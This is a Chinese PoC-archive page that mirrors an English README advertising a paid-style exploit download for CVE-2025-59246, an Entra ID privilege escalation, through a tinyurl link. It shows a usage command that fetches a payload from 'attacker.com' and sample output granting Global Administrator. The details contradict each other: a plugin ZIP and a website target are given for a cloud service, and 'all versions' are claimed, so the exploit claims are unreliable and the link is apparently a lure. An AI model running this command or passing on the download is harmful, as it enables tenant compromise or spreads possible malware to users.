目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2025-59246 PoC — Microsoft Entra ID 访问控制错误漏洞

来源
关联漏洞
标题: Microsoft Entra ID 访问控制错误漏洞 (CVE-2025-59246)
Description:Microsoft Entra ID是美国微软(Microsoft)公司的一个基于云的身份和管理解决方案。 Microsoft Entra ID存在访问控制错误漏洞,该漏洞源于权限提升漏洞。
Description
Missing Authentication for Critical Function (CWE-306)
介绍
# CVE-2025-59246 Missing Authentication for Critical Function (CWE-306) - Exploit
## Overview
Azure Entra ID Elevation of Privilege Vulnerability that allows an attacker to gain higher-level access privileges within the Azure Entra ID system
## Exploit:
### [Download here](https://tinyurl.com/vktscj2f)


## Details
+ **CVE ID**: CVE-2025-59246
+ **Published**: 10/09/2025
+ **CVSS**: 9.8
+ **Affected Versoins**:Azure Entra ID all versions
## Impact
Impact: Unauthenticated attackers can gain administrative access, leading to data exfiltration, service disruption, or full tenant compromise.

## Usage 

### Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt` (requires `requests` library).

### Basic Elevation
**Target a user (e.g., your test account) and elevate to Global Admin:**
bash
```
python exploit.py --target http://vulnerable-site.com --payload-url http://attacker.com/malicious-plugin.zip
```
### Output
```
[+] Connecting to legacy Graph endpoint...
[+] Bypassing auth check on /beta/admin/roles/sync
[+] Assigning Global Administrator role to testuser@contoso.com
[+] Verification: Role assigned successfully (HTTP 200)
[!] Warning: Role change may take 5-10 mins to propagate.
```
## What's Included:
**a ZIP file with:**

+ exploit.py: Fully functional Python script for payload generation and delivery.
+ Video demo and advanced customization guides.
+ Support: 30 days of email support for setup issues.
+ Disclaimer: This tool is for ethical penetration testing, red teaming, or educational use only. Vendor is not responsible for misuse. Ensure you have permission to test targets.

##  Feedback
Your feedback helps improve this project. If you find bugs or have suggestions, please report them on the GitHub issues page or contact me:harveyprime21@outlook.com.


文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →